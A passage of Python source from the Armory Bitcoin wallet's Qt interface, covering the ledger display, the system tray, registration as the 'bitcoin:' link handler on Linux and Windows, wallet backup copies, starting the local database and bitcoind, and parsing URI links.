For now, if the user is having trouble loading the blockchain, all
we do is delete mempool.bin (which is frequently corrupted but not
detected as such). However, we may expand this in the future, if
it's determined that more-complicated things are necessary.
"""
LOGERROR('%d attempts to load blockchain failed. Remove mempool.bin.' % nFail)
mempoolfile = os.path.join(ARMORY_HOME_DIR,'mempool.bin')
if os.path.exists(mempoolfile):
os.remove(mempoolfile)
else:
LOGERROR('File mempool.bin does not exist. Nothing deleted.')
####################################################
def menuSelectImportKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must import an address into a specific wallet. If '
'you do not want to import the key into any available wallet, '
'it is recommended you make a new wallet for this purpose.'
'<br><br>'
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window.'
'<br><br>'
'Keys cannot be imported into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def menuSelectSweepKey(self):
QMessageBox.information(self, self.tr('Select Wallet'), self.tr(
'You must select a wallet into which funds will be swept. '
'Double-click on the desired wallet from the main window, then '
'click on "Import/Sweep Private Keys" on the bottom-right '
'of the properties window to sweep to that wallet.'
'<br><br>'
'Keys cannot be swept into watching-only wallets, only full '
'wallets.'), QMessageBox.Ok)
####################################################
def changeNumShow(self):
prefWidth = self.numShowOpts[self.comboNumShow.currentIndex()]
if prefWidth=='All':
self.currLedgMin = 1
self.currLedgMax = self.ledgerSize
self.currLedgWidth = -1
else:
self.currLedgMax = self.currLedgMin + prefWidth - 1
self.currLedgWidth = prefWidth
self.applyLedgerRange()
####################################################
def clickLedgUp(self):
self.currLedgMin -= self.currLedgWidth
self.currLedgMax -= self.currLedgWidth
self.applyLedgerRange()
####################################################
def clickLedgDn(self):
self.currLedgMin += self.currLedgWidth
self.currLedgMax += self.currLedgWidth
self.applyLedgerRange()
####################################################
def applyLedgerRange(self):
if self.currLedgMin < 1:
toAdd = 1 - self.currLedgMin
self.currLedgMin += toAdd
self.currLedgMax += toAdd
if self.currLedgMax > self.ledgerSize:
toSub = self.currLedgMax - self.ledgerSize
self.currLedgMin -= toSub
self.currLedgMax -= toSub
self.currLedgMin = max(self.currLedgMin, 1)
self.btnLedgUp.setVisible(self.currLedgMin!=1)
self.btnLedgDn.setVisible(self.currLedgMax!=self.ledgerSize)
self.createCombinedLedger()
####################################################
def openSettings(self):
LOGDEBUG('openSettings')
dlgSettings = DlgSettings(self, self)
dlgSettings.exec_()
####################################################
def setupSystemTray(self):
LOGDEBUG('setupSystemTray')
# Creating a QSystemTray
self.sysTray = QSystemTrayIcon(self)
self.sysTray.setIcon( QIcon(self.iconfile) )
self.sysTray.setVisible(True)
self.sysTray.setToolTip('Armory' + (' [Testnet]' if USE_TESTNET else '') + (' [Regtest]' if USE_REGTEST else ''))
self.connect(self.sysTray, SIGNAL('messageClicked()'), self.bringArmoryToFront)
self.connect(self.sysTray, SIGNAL('activated(QSystemTrayIcon::ActivationReason)'), \
self.sysTrayActivated)
menu = QMenu(self)
def traySend():
self.bringArmoryToFront()
self.clickSendBitcoins()
def trayRecv():
self.bringArmoryToFront()
self.clickReceiveCoins()
actShowArmory = self.createAction(self.tr('Show Armory'), self.bringArmoryToFront)
actSendBtc = self.createAction(self.tr('Send Bitcoins'), traySend)
actRcvBtc = self.createAction(self.tr('Receive Bitcoins'), trayRecv)
actClose = self.createAction(self.tr('Quit Armory'), self.closeForReal)
# Create a short menu of options
menu.addAction(actShowArmory)
menu.addAction(actSendBtc)
menu.addAction(actRcvBtc)
menu.addSeparator()
menu.addAction(actClose)
self.sysTray.setContextMenu(menu)
self.notifyQueue = []
self.notifyBlockedUntil = 0
#############################################################################
@AllowAsync
def registerBitcoinWithFF(self):
# the 3 RDF nodes needed to register bitcoin as a protocol in Firefox
rdfschemehandler = 'about=\"urn:scheme:handler:bitcoin\"'
rdfscheme = 'about=\"urn:scheme:bitcoin\"'
rdfexternalApp = 'about=\"urn:scheme:externalApplication:bitcoin\"'
#find mimeTypes.rdf file
rdfs_found = glob.glob(
os.path.join(
os.path.expanduser("~"),
".mozilla",
"firefox",
"*",
"mimeTypes.rdf"
)
)
for rdfs in rdfs_found:
if rdfs:
try:
FFrdf = open(rdfs, 'r+')
except IOError:
continue
ct = FFrdf.readlines()
rdfsch=-1
rdfsc=-1
rdfea=-1
i=0
#look for the nodes
for line in ct:
if rdfschemehandler in line:
rdfsch=i
elif rdfscheme in line:
rdfsc=i
elif rdfexternalApp in line:
rdfea=i
i+=1
#seek to end of file
FFrdf.seek(-11, 2)
i = 0
#add the missing nodes
if rdfsch == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:handler:bitcoin\"\n')
FFrdf.write(' NC:alwaysAsk=\"false\">\n')
FFrdf.write(' <NC:externalApplication RDF:resource=\"urn:scheme:externalApplication:bitcoin\"/>\n')
FFrdf.write(' <NC:possibleApplication RDF:resource=\"urn:handler:local:/usr/bin/xdg-open\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfsc == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:bitcoin\"\n')
FFrdf.write(' NC:value=\"bitcoin\">\n')
FFrdf.write(' <NC:handlerProp RDF:resource=\"urn:scheme:handler:bitcoin\"/>\n')
FFrdf.write(' </RDF:Description>\n')
i+=1
if rdfea == -1:
FFrdf.write(' <RDF:Description RDF:about=\"urn:scheme:externalApplication:bitcoin\"\n')
FFrdf.write(' NC:prettyName=\"xdg-open\"\n')
FFrdf.write(' NC:path=\"/usr/bin/xdg-open\" />\n')
i+=1
if i != 0:
FFrdf.write('</RDF:RDF>\n')
FFrdf.close()
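# The nodes written above register the "bitcoin:" scheme in each Firefox
# profile's mimeTypes.rdf, pointing it at /usr/bin/xdg-open so clicked
# links get routed to the system's default handler (which is set
# elsewhere by setupUriRegistration).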
#############################################################################
def setupUriRegistration(self, justDoIt=False):
"""
Setup Armory as the default application for handling bitcoin: links
"""
LOGINFO('setupUriRegistration')
if USE_TESTNET or USE_REGTEST:
return
if OS_LINUX:
out,err = execAndWait('gconftool-2 --get /desktop/gnome/url-handlers/bitcoin/command')
out2,err = execAndWait('xdg-mime query default x-scheme-handler/bitcoin')
#check FF protocol association
#checkFF_thread = threading.Thread(target=self.registerBitcoinWithFF)
#checkFF_thread.start()
self.registerBitcoinWithFF(async=True)
def setAsDefault():
LOGINFO('Setting up Armory as default URI handler...')
execAndWait('gconftool-2 -t string -s /desktop/gnome/url-handlers/bitcoin/command "python2 %s \"%%s\""' % __file__)
execAndWait('gconftool-2 -s /desktop/gnome/url-handlers/bitcoin/needs_terminal false -t bool')
execAndWait('gconftool-2 -t bool -s /desktop/gnome/url-handlers/bitcoin/enabled true')
execAndWait('xdg-mime default armory.desktop x-scheme-handler/bitcoin')
if ('no value' in out.lower() or 'no value' in err.lower()) and not 'armory.desktop' in out2.lower():
# Silently add Armory if it's never been set before
setAsDefault()
elif (not 'armory' in out.lower() or not 'armory.desktop' in out2.lower()) and not self.firstLoad:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
if not self.getSettingOrSetDefault('DNAA_DefaultApp', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[0]==True:
setAsDefault()
if reply[1]==True:
self.writeSetting('DNAA_DefaultApp', True)
elif OS_WINDOWS:
# Check for existing registration (user first, then root, if necessary)
action = 'DoNothing'
modulepathname = '"'
if getattr(sys, 'frozen', False):
app_dir = os.path.dirname(sys.executable)
app_path = os.path.join(app_dir, sys.executable)
elif __file__:
return #running from a .py script, not gonna register URI on Windows
#justDoIt = True
import ctypes
GetModuleFileNameW = ctypes.windll.kernel32.GetModuleFileNameW
GetModuleFileNameW.restype = ctypes.c_int
app_path = ctypes.create_string_buffer(1024)
rtlength = ctypes.c_int()
rtlength = GetModuleFileNameW(None, ctypes.byref(app_path), 1024)
passstr = str(app_path.raw)
modulepathname += unicode(passstr[0:(rtlength*2)], encoding='utf16') + u'" "%1"'
modulepathname = modulepathname.encode('utf8')
rootKey = 'bitcoin\\shell\\open\\command'
try:
userKey = 'Software\\Classes\\' + rootKey
registryKey = OpenKey(HKEY_CURRENT_USER, userKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
if val.lower()==modulepathname.lower():
LOGINFO('Armory already registered for current user. Done!')
return
else:
action = 'DoIt' #armory is registered, but to another path
else:
# Already set to something (at least created, which is enough)
action = 'AskUser'
except:
# No user-key set, check if root-key is set
try:
registryKey = OpenKey(HKEY_CLASSES_ROOT, rootKey, 0, KEY_READ)
val,code = QueryValueEx(registryKey, '')
if 'armory' in val.lower():
LOGINFO('Armory already registered at admin level. Done!')
return
else:
# Root key is set (or at least created, which is enough)
action = 'AskUser'
except:
action = 'DoIt'
dontAsk = self.getSettingOrSetDefault('DNAA_DefaultApp', False)
dontAskDefault = self.getSettingOrSetDefault('AlwaysArmoryURI', False)
if justDoIt:
LOGINFO('URL-register: just doing it')
action = 'DoIt'
elif dontAsk and dontAskDefault:
LOGINFO('URL-register: user wants to do it by default')
action = 'DoIt'
elif action=='AskUser' and not self.firstLoad and not dontAsk:
# If another application has it, ask for permission to change it
# Don't bother the user on the first load with it if verification is
# needed. They have enough to worry about with this weird new program...
reply = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Default URL Handler'),
self.tr('Armory is not set as your default application for handling '
'"bitcoin:" links. Would you like to use Armory as the '
'default?'), self.tr('Do not ask this question again'))
if reply[1]==True:
LOGINFO('URL-register: do not ask again: always %s', str(reply[0]))
self.writeSetting('DNAA_DefaultApp', True)
self.writeSetting('AlwaysArmoryURI', reply[0])
if reply[0]==True:
action = 'DoIt'
else:
LOGINFO('User requested not to use Armory as URI handler')
return
# Finally, do it if we're supposed to!
LOGINFO('URL-register action: %s', action)
if action=='DoIt':
LOGINFO('Registering Armory for current user')
baseDir = os.path.dirname(unicode(passstr[0:(rtlength*2)], encoding='utf16'))
regKeys = []
regKeys.append(['Software\\Classes\\bitcoin', '', 'URL:bitcoin Protocol'])
regKeys.append(['Software\\Classes\\bitcoin', 'URL Protocol', ""])
regKeys.append(['Software\\Classes\\bitcoin\\shell', '', None])
regKeys.append(['Software\\Classes\\bitcoin\\shell\\open', '', None])
for key,name,val in regKeys:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
regKeysU = []
regKeysU.append(['Software\\Classes\\bitcoin\\shell\\open\\command', '', \
modulepathname])
regKeysU.append(['Software\\Classes\\bitcoin\\DefaultIcon', '', \
'"%s\\armory48x48.ico"' % baseDir])
for key,name,val in regKeysU:
dkey = '%s\\%s' % (key,name)
LOGINFO('\tWriting key: [HKEY_CURRENT_USER\\] ' + dkey)
registryKey = CreateKey(HKEY_CURRENT_USER, key)
#hKey = ctypes.c_int(registryKey.handle)
#ctypes.windll.Advapi32.RegSetValueEx(hKey, None, 0, REG_SZ, val, (len(val)+1))
SetValueEx(registryKey, name, 0, REG_SZ, val)
CloseKey(registryKey)
#############################################################################
def warnNewUSTXFormat(self):
if not self.getSettingOrSetDefault('DNAA_Version092Warn', False):
reply = MsgBoxWithDNAA(self, self, MSGBOX.Warning, self.tr("Version Warning"), self.tr(
'Since Armory version 0.92 the formats for offline transaction '
'operations have changed to accommodate multi-signature '
'transactions. This format is <u>not</u> compatible with '
'versions of Armory before 0.92. '
'<br><br>'
'To continue, the other system will need to be upgraded to '
'version 0.92 or later. If you cannot upgrade the other '
'system, you will need to reinstall an older version of Armory '
'on this system.'), dnaaMsg=self.tr('Do not show this warning again'))
self.writeSetting('DNAA_Version092Warn', reply[1])
#############################################################################
def execOfflineTx(self):
self.warnNewUSTXFormat()
dlgSelect = DlgOfflineSelect(self, self)
if dlgSelect.exec_():
# If we got here, one of three buttons was clicked.
if dlgSelect.do_create:
DlgSendBitcoins(self.getSelectedWallet(), self, self,
onlyOfflineWallets=True).exec_()
elif dlgSelect.do_broadc:
DlgSignBroadcastOfflineTx(self,self).exec_()
#############################################################################
def sizeHint(self):
return QSize(1000, 650)
#############################################################################
def openToolsDlg(self):
QMessageBox.information(self, self.tr('No Tools Yet!'),
self.tr('The developer tools are not available yet, but will be added '
'soon. Regardless, developer-mode still offers lots of '
'extra information and functionality that is not available in '
'Standard or Advanced mode.'), QMessageBox.Ok)
#############################################################################
def execIntroDialog(self):
if not self.getSettingOrSetDefault('DNAA_IntroDialog', False):
dlg = DlgIntroMessage(self, self)
result = dlg.exec_()
if dlg.chkDnaaIntroDlg.isChecked():
self.writeSetting('DNAA_IntroDialog', True)
if dlg.requestCreate:
self.startWalletWizard()
if dlg.requestImport:
self.execImportWallet()
#############################################################################
def makeWalletCopy(self, parent, wlt, copyType='Same', suffix='', changePass=False):
'''Create a digital backup of your wallet.'''
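# copyType values handled below: 'Same' writes a fresh copy of the wallet
# file as-is, 'Decrypt' writes an unencrypted copy (unlocking first if
# needed), 'Encrypt' writes a copy protected by a (possibly new)
# passphrase, and 'PKCC' exports only the root public key data to a
# .rootpubkey text file.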
if changePass:
LOGERROR('Changing password is not implemented yet!')
raise NotImplementedError
# Set the file name.
export_rootpubkey = False
if copyType.lower()=='pkcc':
fn = 'armory_%s.%s' % (wlt.uniqueIDB58, suffix)
export_rootpubkey = True
else:
fn = 'armory_%s_%s.wallet' % (wlt.uniqueIDB58, suffix)
if wlt.watchingOnly and copyType.lower() != 'pkcc':
fn = 'armory_%s_%s_WatchOnly.wallet' % (wlt.uniqueIDB58, suffix)
if export_rootpubkey is True:
savePath = unicode(self.getFileSave(defaultFilename=fn,
ffilter=['Root Pubkey Text Files (*.rootpubkey)']))
else:
savePath = unicode(self.getFileSave(defaultFilename=fn))
if not len(savePath) > 0:
return False
# Create the file based on the type you want.
if copyType.lower()=='same':
wlt.writeFreshWalletFile(savePath)
elif copyType.lower()=='decrypt':
if wlt.useEncryption:
dlg = DlgUnlockWallet(wlt, parent, self, 'Unlock Private Keys')
if not dlg.exec_():
return False
# Wallet should now be unlocked
wlt.makeUnencryptedWalletCopy(savePath)
elif copyType.lower()=='encrypt':
newPassphrase=None
if not wlt.useEncryption:
dlgCrypt = DlgChangePassphrase(parent, self, not wlt.useEncryption)
if not dlgCrypt.exec_():
QMessageBox.information(parent, self.tr('Aborted'), self.tr(
'No passphrase was selected for the encrypted backup. '
'No backup was created.'), QMessageBox.Ok)
return False
newPassphrase = SecureBinaryData(str(dlgCrypt.edtPasswd1.text()))
wlt.makeEncryptedWalletCopy(savePath, newPassphrase)
elif copyType.lower() == 'pkcc':
wlt.writePKCCFile(savePath)
else:
LOGERROR('Invalid "copyType" supplied to makeWalletCopy: %s', copyType)
return False
QMessageBox.information(parent, self.tr('Backup Complete'), self.tr(
'Your wallet was successfully backed up to the following '
'location:<br><br>%1').arg(savePath), QMessageBox.Ok)
return True
#############################################################################
def createAction(self, txt, slot, isCheckable=False, \
ttip=None, iconpath=None, shortcut=None):
"""
Modeled from the "Rapid GUI Programming with Python and Qt" book, page 174
"""
icon = QIcon()
if iconpath:
icon = QIcon(iconpath)
theAction = QAction(icon, txt, self)
if isCheckable:
theAction.setCheckable(True)
self.connect(theAction, SIGNAL('toggled(bool)'), slot)
else:
self.connect(theAction, SIGNAL('triggered()'), slot)
if ttip:
theAction.setToolTip(ttip)
theAction.setStatusTip(ttip)
if shortcut:
theAction.setShortcut(shortcut)
return theAction
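# Illustrative usage (the action name and tooltip here are hypothetical):
#   actSettings = self.createAction(self.tr('Settings'), self.openSettings,
#                                   ttip=self.tr('Open the settings dialog'),
#                                   shortcut='Ctrl+,')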
#############################################################################
def setUserMode(self, mode):
LOGINFO('Changing usermode:')
LOGINFO(' From: %s', self.settings.get('User_Mode'))
self.usermode = mode
if mode==USERMODE.Standard:
self.writeSetting('User_Mode', 'Standard')
if mode==USERMODE.Advanced:
self.writeSetting('User_Mode', 'Advanced')
if mode==USERMODE.Expert:
self.writeSetting('User_Mode', 'Expert')
LOGINFO(' To: %s', self.settings.get('User_Mode'))
if not self.firstModeSwitch:
QMessageBox.information(self,self.tr('Restart Armory'),
self.tr('You may have to restart Armory for all aspects of '
'the new usermode to go into effect.'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def setLang(self, lang):
LOGINFO('Changing language:')
LOGINFO(' From: %s', self.settings.get('Language'))
self.language = lang
self.writeSetting("Language", lang)
LOGINFO(' To: %s', self.settings.get('Language'))
if not self.firstModeSwitch:
QMessageBox.information(self, self.tr('Restart Armory'),
self.tr('You will have to restart Armory for the new language to go into effect'), QMessageBox.Ok)
self.firstModeSwitch = False
#############################################################################
def getPreferredDateFormat(self):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
globalDefault = binary_to_hex(DEFAULT_DATE_FORMAT)
fmt = self.getSettingOrSetDefault('DateFormat', globalDefault)
return hex_to_binary(str(fmt)) # short hex strings could look like int()
#############################################################################
def setPreferredDateFormat(self, fmtStr):
# Treat the format as "binary" to make sure any special symbols don't
# interfere with the SettingsFile symbols
try:
unixTimeToFormatStr(1000000000, fmtStr)
except:
QMessageBox.warning(self, self.tr('Invalid Date Format'),
self.tr('The date format you specified was not valid. Please re-enter '
'it using only the strftime symbols shown in the help text.'), QMessageBox.Ok)
return False
self.writeSetting('DateFormat', binary_to_hex(fmtStr))
return True
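# The chosen strftime string round-trips through binary_to_hex() on write
# and hex_to_binary() on read (see getPreferredDateFormat above), so
# characters like '%' never collide with the SettingsFile syntax.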
#############################################################################
def triggerProcessMutexNotification(self, uriLink):
self.bringArmoryToFront()
uriDict = parseBitcoinURI(uriLink)
if len(uriDict) > 0:
self.uriLinkClicked(uriLink)
#############################################################################
def acquireProcessMutex(self):
LOGINFO('acquiring process mutex...')
self.connect(self, SIGNAL("processMutexNotification"), \
self.triggerProcessMutexNotification)
# Prevent Armory from being opened twice
def uriClick_partial(a):
self.emit(SIGNAL("processMutexNotification"), a)
if CLI_OPTIONS.interport > 1:
from armoryengine.ProcessMutex import PySide_ProcessMutex
self.prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, uriClick_partial)
if self.prc_mutex.acquire() == False:
LOGWARN('Socket already occupied! This must be a duplicate Armory')
QMessageBox.warning(self, self.tr('Already Open'), self.tr(
'Armory is already running! You can only have one Armory open '
'at a time. Exiting...'), QMessageBox.Ok)
os._exit(0)
else:
LOGWARN('*** Listening port is disabled. URI-handling will not work')
self.internetStatus = INTERNET_STATUS.DidNotCheck
############################################################################
def startArmoryDBIfNecessary(self):
if CLI_OPTIONS.offline:
LOGWARN("Offline instance, not startig the DB")
return False
try:
if TheBDM.hasRemoteDB() == False:
#check there is no local db
localDBPort = Cpp.BlockDataManagerConfig_hasLocalDB(\
str(ARMORY_HOME_DIR), armoryengine.ArmoryUtils.ARMORYDB_PORT)
if len(localDBPort) > 0:
armoryengine.ArmoryUtils.ARMORYDB_PORT = localDBPort
return True
#look for cookie file and delete it
cookiePath = os.path.join(ARMORY_HOME_DIR, ".cookie_")
if os.path.exists(cookiePath):
os.remove(cookiePath)
#If we got this far, we need to spawn a local db
self.setSatoshiPaths()
TheSDM.spawnDB(str(ARMORY_HOME_DIR), TheBDM.armoryDBDir)
#wait for cookie file creation
while not os.path.exists(cookiePath):
time.sleep(0.1)
#get port from cookie
armoryengine.ArmoryUtils.ARMORYDB_PORT = \
Cpp.BlockDataManagerConfig_getPortFromCookie(str(ARMORY_HOME_DIR))
#test if db has started
if Cpp.BlockDataManagerConfig_testConnection(\
ARMORYDB_IP, armoryengine.ArmoryUtils.ARMORYDB_PORT) == False:
LOGERROR("Failed to spawn ArmoryDB")
return False
LOGINFO("Connecting on port %s" % armoryengine.ArmoryUtils.ARMORYDB_PORT)
else:
LOGWARN("DB is already running")
return True
except Exception as e:
LOGEXCEPT('Failed to start Armory database: %s' % str(e))
return False
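# Summary of the local-DB handshake above: spawnDB() launches ArmoryDB,
# which writes a .cookie_ file into ARMORY_HOME_DIR; we poll for that
# file, read the listening port out of it with getPortFromCookie, and
# then confirm with testConnection before declaring the DB started.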
############################################################################
def startBitcoindIfNecessary(self):
LOGINFO('startBitcoindIfNecessary')
TheSDM.checkDBIsLocal()
if self.internetStatus == INTERNET_STATUS.Unavailable or \
CLI_OPTIONS.offline:
LOGWARN('Not online, will not start bitcoind')
return False
if TheBDM.hasRemoteDB() or not self.doAutoBitcoind:
return False
if TheSDM.satoshiIsAvailable():
LOGWARN('Tried to start bitcoind, but satoshi already running')
return False
self.setSatoshiPaths()
try:
# "satexe" is actually just the install directory, not the direct
# path the executable. That dir tree will be searched for bitcoind
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
TheSDM.startBitcoind()
LOGDEBUG('Bitcoind started without error')
return True
except:
LOGEXCEPT('Failed to setup SDM')
self.switchNetworkMode(NETWORKMODE.Offline)
############################################################################
def notifyBitcoindIsReady(self):
self.signalExecution.executeMethod(\
self.completeBlockchainProcessingInitialization)
############################################################################
def setSatoshiPaths(self):
LOGINFO('setSatoshiPaths')
# We skip the getSettingOrSetDefault call, because we don't want to set
# it if it doesn't exist
if self.settings.hasSetting('SatoshiExe'):
if not os.path.exists(self.settings.get('SatoshiExe')):
LOGERROR('Bitcoin installation setting is a non-existent directory')
self.satoshiExeSearchPath = [self.settings.get('SatoshiExe')]
else:
self.satoshiExeSearchPath = []
self.satoshiHomePath = BTC_HOME_DIR
if self.settings.hasSetting('SatoshiDatadir'):
# The setting overrides BTC_HOME_DIR only if it wasn't explicitly
# set on the command line.
manageSatoshi = self.settings.get('ManageSatoshi')
if manageSatoshi == True:
self.satoshiHomePath = str(self.settings.get('SatoshiDatadir'))
LOGINFO('Setting satoshi datadir = %s' % self.satoshiHomePath)
TheBDM.setSatoshiDir(self.satoshiHomePath)
TheSDM.setSatoshiDir(self.satoshiHomePath)
############################################################################
# This version of isOnlineModePossible doesn't re-check internet connectivity every time
def isOnlineModePossible(self):
return self.internetStatus != INTERNET_STATUS.Unavailable and \
TheSDM.satoshiIsAvailable() and \
os.path.exists(os.path.join(TheBDM.btcdir, 'blocks'))
############################################################################
def loadBlockchainIfNecessary(self):
LOGINFO('loadBlockchainIfNecessary')
if self.netMode != NETWORKMODE.Offline:
# Track number of times we start loading the blockchain.
# We will decrement the number when loading finishes
# We can use this to detect problems with mempool or blkxxxx.dat
self.numTriesOpen = self.getSettingOrSetDefault('FailedLoadCount', 0)
if self.numTriesOpen>2:
self.loadFailedManyTimesFunc(self.numTriesOpen)
self.settings.set('FailedLoadCount', self.numTriesOpen+1)
try:
TheBDM.goOnline()
self.switchNetworkMode(NETWORKMODE.Full)
except Cpp.NoArmoryDBExcept:
self.switchNetworkMode(NETWORKMODE.Offline)
#############################################################################
def switchNetworkMode(self, newMode):
LOGINFO('Setting netmode: %s', newMode)
self.netMode=newMode
return
#############################################################################
def parseUriLink(self, uriStr, click=True):
if len(uriStr) < 1:
QMessageBox.critical(self, self.tr('No URL String'),
self.tr('You have not entered a URL String yet. '
'Please go back and enter a URL String.'), QMessageBox.Ok)
return {}
LOGINFO('URI link clicked!')
LOGINFO('The following URI string was parsed:')
LOGINFO(uriStr.replace('%','%%'))
try:
uriDict = parseBitcoinURI(uriStr)
except:
# malformed uri, make the dict empty, which will trigger the warning
uriDict = {}
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
LOGERROR('Clicked or entered "bitcoin:" link in offline mode.')
self.bringArmoryToFront()
if click:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You clicked on a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Offline Mode'),
self.tr('You entered a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'Using links will only work if Armory is connected '
'to the Bitcoin network!'), QMessageBox.Ok)
return {}
if len(uriDict)==0:
if click:
warnMsg = (self.tr('It looks like you just clicked a "bitcoin:" link, but that link is malformed.'))
else:
warnMsg = (self.tr('It looks like you just entered a "bitcoin:" link, but that link is malformed.'))
if self.usermode == USERMODE.Standard:
warnMsg += (self.tr('Please check the source of the link and enter the transaction manually.'))
else:
warnMsg += self.tr('The raw URI string is:\n\n') + uriStr
QMessageBox.warning(self, self.tr('Invalid URI'), warnMsg, QMessageBox.Ok)
LOGERROR(warnMsg.replace('\n', ' '))
return {}
if not uriDict.has_key('address'):
if click:
QMessageBox.warning(self, self.tr('The "bitcoin:" link you just clicked '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('The "bitcoin:" link you just entered '
'does not even contain an address! There is nothing that '
'Armory can do with this link!'), QMessageBox.Ok)
LOGERROR('No address in "bitcoin:" link! Nothing to do!')
return {}
# Verify the URI is for the same network as this Armory instance
theAddrByte = checkAddrType(base58_to_binary(uriDict['address']))
if theAddrByte!=-1 and not theAddrByte in [ADDRBYTE, P2SHBYTE]:
net = 'Unknown Network'
if NETWORKS.has_key(theAddrByte):
net = NETWORKS[theAddrByte]
if click:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just clicked is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Wrong Network!'),
self.tr('The address for the "bitcoin:" link you just entered is '
'for the wrong network! You are on the <b>%2</b> '
'and the address you supplied is for the '
'<b>%3</b>!').arg(NETWORKS[ADDRBYTE], net), QMessageBox.Ok)
LOGERROR('URI link is for the wrong network!')
return {}
# If the URI contains "req-" strings we don't recognize, throw error
recognized = ['address','version','amount','label','message']
for key,value in uriDict.iteritems():
if key.startswith('req-') and not key[4:] in recognized:
if click:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just clicked contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you clicked on uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'), QMessageBox.Ok)
else:
QMessageBox.warning(self, self.tr('Unsupported URI'), self.tr('The "bitcoin:" link '
'you just entered contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you entered uses an exotic, unsupported format. '
'<br><br>The action cannot be completed.'), QMessageBox.Ok)
LOGERROR('URI link contains unrecognized req- fields.')
return {}
return uriDict
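# A successfully parsed link comes back as a dict keyed by the URI fields,
# e.g. a link like "bitcoin:<address>?amount=...&label=..." presumably
# yields {'address': ..., 'amount': ..., 'label': ...} (the exact value
# types depend on parseBitcoinURI, which lives outside this file).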
#############################################################################
def uriLinkClicked(self, uriStr):
LOGINFO('uriLinkClicked')
if TheBDM.getState()==BDM_OFFLINE:
QMessageBox.warning(self, self.tr('Offline'),
self.tr('You just clicked on a "bitcoin:" link, but Armory is offline '
'and cannot send transactions. Please click the link '
'again when Armory is online.'), \
QMessageBox.Ok)
return
elif not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
# BDM isn't ready yet; save URI strings in the delayed URI dict to
# replay later through finishLoadBlockchainGUI
qLen = self.delayedURIData['qLen']
self.delayedURIData[qLen] = uriStr
qLen = qLen +1
self.delayedURIData['qLen'] = qLen
return
uriDict = self.parseUriLink(uriStr, click=True)
if len(uriDict)>0:
self.bringArmoryToFront()
return self.uriSendBitcoins(uriDict)
#############################################################################
def loadWalletsAndSettings(self, updateProgress):
LOGINFO('loadWalletsAndSettings')
self.getSettingOrSetDefault('First_Load', True)
self.getSettingOrSetDefault('Load_Count', 0)
self.getSettingOrSetDefault('User_Mode', 'Advanced')
self.getSettingOrSetDefault('UnlockTimeout', 10)
self.getSettingOrSetDefault('DNAA_UnlockTimeout', False)
# Determine if we need to do new-user operations, increment load-count
self.firstLoad = False
if self.getSettingOrSetDefault('First_Load', True):
self.firstLoad = True
self.writeSetting('First_Load', False)
self.writeSetting('First_Load_Date', long(RightNow()))
self.writeSetting('Load_Count', 1)
self.writeSetting('AdvFeature_UseCt', 0)
else:
self.writeSetting('Load_Count', (self.settings.get('Load_Count')+1) % 100)
# Set the usermode, default to standard
self.usermode = USERMODE.Standard
if self.settings.get('User_Mode') == 'Advanced':
self.usermode = USERMODE.Advanced
elif self.settings.get('User_Mode') == 'Expert':
self.usermode = USERMODE.Expert
# Set the language, default to English
self.language = 'en'
if self.settings.get('Language') != '':
self.language = self.settings.get('Language')
# The user may have asked to never be notified of a particular
# notification again. We have a short-term list (wiped on every
# load), and a long-term list (saved in settings). We simply
# initialize the short-term list with the long-term list, and add
# short-term ignore requests to it
notifyStr = self.getSettingOrSetDefault('NotifyIgnore', '')
nsz = len(notifyStr)
self.notifyIgnoreLong = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
self.notifyIgnoreShort = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
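# The ignore list is stored as one concatenated string of fixed-width
# (8-character) notification IDs, split back into 8-char chunks here.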
# Load wallets found in the .armory directory
self.walletMap = {}
self.walletIndices = {}
self.walletIDSet = set()
self.walletManager = None
# I need some linear lists for accessing by index
self.walletIDList = []
self.walletVisibleList = []
self.wltIDList = []
self.combinedLedger = []
self.ledgerSize = 0
self.ledgerTable = []
self.walletSideScanProgress = {}
LOGINFO('Loading wallets...')
wltPaths = readWalletFiles()
wltExclude = self.settings.get('Excluded_Wallets', expectList=True)
